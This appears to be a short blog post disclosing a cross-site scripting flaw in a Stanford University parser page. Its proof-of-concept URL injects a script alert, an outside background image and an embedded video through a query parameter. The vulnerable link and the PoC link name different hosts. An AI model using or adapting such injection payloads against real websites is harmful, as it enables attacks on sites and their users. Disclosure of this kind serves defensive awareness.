Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label s. Show all posts
XSS Vulnerability
s Vulnerability Web Application Vulnerability XSS Vulnerability

Stanford.edu Parser is vulnerable to XSS(Cross site Scripting )

Hacker Sony discovered a new XSS vulnerability in Standford university website(Standford.edu).  The vulnerability is in Standford Parser.

The vulnerable Link:
http://nlp.stanford.edu:8080/parser/index.jsp

Poc:
http://ncbolabs-dev1.stanford.edu:8080/parsetrees/execute.jsp?query=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/eda/shoko/shoko14.gif%22%3E%3Cscript%3Ealert%28%22Hmm..Chocolate.%20XSS%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/5C24Grhhfy0%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&type=string

[source]
Read more »
Subscribe to: Posts (Atom)